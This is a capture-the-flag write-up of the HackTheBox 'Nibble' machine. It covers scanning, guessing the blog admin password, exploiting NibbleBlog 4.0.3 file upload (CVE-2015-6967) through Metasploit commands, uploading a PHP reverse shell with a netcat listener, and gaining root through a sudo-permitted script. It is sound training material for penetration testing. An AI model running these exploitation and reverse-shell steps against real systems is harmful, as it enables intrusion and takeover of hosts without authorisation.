HackTheBox Write-up Nibble

Become a Patron!

This is the write-up of the Machine NIBBLE from HackTheBox


A nibble is an easy machine, based on nimble blog vulnerability, using Metasploit we gain the initial shell, and after exploiting SUID we gain root on the machine.

Machine Author: mrb3n
Machine Type: Linux
Machine Level: 3.7/10

machine map


  • Nmap
  • Searchsploit
  • Metasploit

Absorb Skills

  • CVE-2015–6967

Scanning the Network

$namp -sC -sV
man nmap
nmap result

Page source of the port 80 gives us some hint about /nibbleblog directory.


Running Dirbuster on Port 80


Admin.php looks interesting, let's try to brute-force which some common used password.

admin page

Username: admin

Password: nibbles

Setting page

Nibble blog is on 4.0.3 version lets try to find out if there is any vulnerability available.

Exploiting the Server

searchsploit nibbleblog 4.0.3
searchsploit result

Let's use Metasploit to exploit the vulnerability.

msf5 > use exploit/multi/http/nibbleblog_file_upload  
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi nibbleblog
targeturi => nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS
msf5 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
preparing exploit
exploiting the server


Basic Linux Privilege Escalation

$ find / -perm -u=s -type f 2>/dev/null
$ sudo -l
man sudo
finding the NOPASSWD file

we can run the monitor.sh without using the password.



This file does not exist, however, so it is possible to create a simple bash script in its place to achieve root access.

creating the bash script
own root

Manual exploitation

NibbleBlog 4.0.3: Code Execution

STEP 1:- Find the PHP reverse shell.

I am using a Pentestmonkey reverse shell.


STEP 2:-Upload the PHP shell as and image.


STEP 3:-Setting up the reverse shell.

$nc -lnvp 4444
man nc

STEP 4:- Visit the image URL it will give back the reverse shell.

reverse shell

inc0gnito – Medium

Thanks for reading! If you enjoyed this story, please click the ? button and share it to help others! Feel free to leave a comment ? below. Have feedback? Let’s connect on Twitter.

Follow Infosec Write-ups for more such awesome write-ups.

InfoSec Write-ups

HackTheBox Write-up Nibble was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

HackTheBox Write-up Nibble
InfoSec Write-ups – Medium
Source link

Show More

Leave a Reply

Back to top button